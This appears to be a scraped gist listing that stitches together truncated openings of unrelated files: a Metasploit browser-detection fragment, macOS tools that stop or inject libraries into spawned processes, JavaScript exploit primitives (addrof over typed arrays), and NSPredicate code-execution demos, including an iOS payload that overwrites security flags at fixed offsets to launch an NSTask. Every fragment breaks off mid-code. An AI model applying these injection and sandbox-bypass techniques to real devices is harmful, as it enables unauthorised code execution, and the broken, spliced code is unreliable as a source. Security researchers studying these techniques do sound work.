<script>
// Case matters, see lib/msf/core/constants.rb
// All of these should match up with constants in ::Msf::HttpClients
// Browser-name constants, one per client family. The exact casing is
// significant because the values are expected to match the Ruby side.
var clients_opera  = "Opera",
    clients_ie     = "MSIE",
    clients_ff     = "Firefox",
    clients_chrome = "Chrome",
    clients_safari = "Safari";
@saagarjha
saagarjha / stop_at_entry.c
Last active October 11, 2023 03:41
Endpoint Security client that sends SIGSTOP to newly spawned processes
// To compile: clang stop_at_entry.c -lbsm -lEndpointSecurity -o stop_at_entry,
// then codesign with com.apple.developer.endpoint-security.client and run the
// program as root.
#include <EndpointSecurity/EndpointSecurity.h>
#include <assert.h>
#include <bsm/libbsm.h>
#include <dispatch/dispatch.h>
#include <signal.h>
#include <stdbool.h>
class Helpers {
constructor() {
this.addrof_LO = new Array(1048577);
this.buf = new ArrayBuffer(8);
this.f64 = new Float64Array(this.buf);
this.f32 = new Float32Array(this.buf);
this.u32 = new Uint32Array(this.buf);
this.u64 = new BigUint64Array(this.buf);
this.state = {};
@saagarjha
saagarjha / library_injector.cpp
Last active July 24, 2024 00:07
Load a library into newly spawned processes (using DYLD_INSERT_LIBRARIES and EndpointSecurity)
// To compile: clang++ -arch x86_64 -arch arm64 -std=c++20 library_injector.cpp -lbsm -lEndpointSecurity -o library_injector,
// then codesign with com.apple.developer.endpoint-security.client and run the
// program as root.
#include <EndpointSecurity/EndpointSecurity.h>
#include <algorithm>
#include <array>
#include <bsm/libbsm.h>
#include <cstddef>
#include <cstdint>
@aemmitt-ns
aemmitt-ns / predicament.m
Created April 9, 2022 03:20
Non-deprecated NSPredicate arbitrary code exec example
#import <Foundation/Foundation.h>
/*
[~/predicament]$ gcc -framework Foundation -lobjc -o predicament predicament.m
[~/predicament]$ ./predicament "function('','stringByAppendingFormat:','%lld ').longLongValue"
Expr: 'FUNCTION("", "stringByAppendingFormat:" , "%lld ").longLongValue' (type: 4)
Value: 105553129238592
Danger: 105553129237664 (offset 928)
[~/predicament]$ ./predicament "function(function('','stringByAppendingFormat:','%lld ').longLongValue-928,'longValue').dangerous"
@aemmitt-ns
aemmitt-ns / nspredpayload.m
Last active December 30, 2023 06:26
NSPredicate payload for iOS that disables security checks and launches an NSTask
NSPredicate *pred = [NSPredicate predicateWithFormat:@"1=cast({" // cast to get nice error in syslog for debugging
// use format string to read the address of _NSPredicateUtilities ( #self() ), theres prolly a better way
"$_NSPredicateUtilities := function('','stringByAppendingFormat:', '%p/%lld', #self()).lastPathComponent.longLongValue,"
"$_predicateSecurityFlags := $_NSPredicateUtilities + 0x188c," // address of _predicateSecurityFlags
"$_predicateSecurityOnce := $_predicateSecurityFlags - 0x276daec," // address of _predicateSecurityOnce
"$forbiddenClassesLength := $_predicateSecurityFlags + 0x63a334," // address of length field for array of forbidden classes
"$forbiddenSelectorsLength := $_predicateSecurityFlags + 0x63a3d4," // address of length field for array of forbidden selectors
"$NSTask := $_NSPredicateUtilities + 0x637860," // address of NSTask class
"$NSPipe := $NSTask - 0x41a0," // address of NSPipe class
@aemmitt-ns
aemmitt-ns / quinefuck.m
Last active October 14, 2023 19:36
a brainfuck interpreter made with an NSExpression that evaluates on itself. idk.
// Default program, used when none is given on the command line: the classic
// brainfuck "Hello World!" source as a single 106-byte literal.
// yields brainfuck when quined
char *h = "++++++++[>++++[>++>+++>+++>+<<<<-]>+>+>->>+[<]<-]>>.>---.+++++++..+++.>>.<-.<.+++.------.--------.>>+.>++.";
#import <Foundation/Foundation.h>
int main(int argc, char *argv[]) {
NSString *program = [NSString stringWithUTF8String: argc > 1 ? argv[1] : h];
NSMutableArray *prog = [NSMutableArray array]; // make the program into an array cuz its easier
for (int i = 0; i < program.length; i++) {
NSString *c = [program substringWithRange: NSMakeRange(i, 1)];
if ([@".,<>-+[]" rangeOfString: c].location != NSNotFound) [prog addObject: c];
@aemmitt-ns
aemmitt-ns / restricted.m
Created May 19, 2023 14:06
Program that dumps the classes and selectors forbidden in NSPredicates
// dump classes and selectors forbidden in NSPredicates
// `cc -framework Foundation -o restricted restricted.m`
#import <Foundation/Foundation.h>
#import <dlfcn.h>
int main() {
void *cf = dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", 0);
NSDictionary* (*RestrictedClasses)() = dlsym(cf, "_CFPredicatePolicyRestrictedClasses");
NSDictionary* (*RestrictedSelectors)() = dlsym(cf, "_CFPredicatePolicyRestrictedSelectors");
NSLog(@"Restricted Selectors: %@", RestrictedSelectors());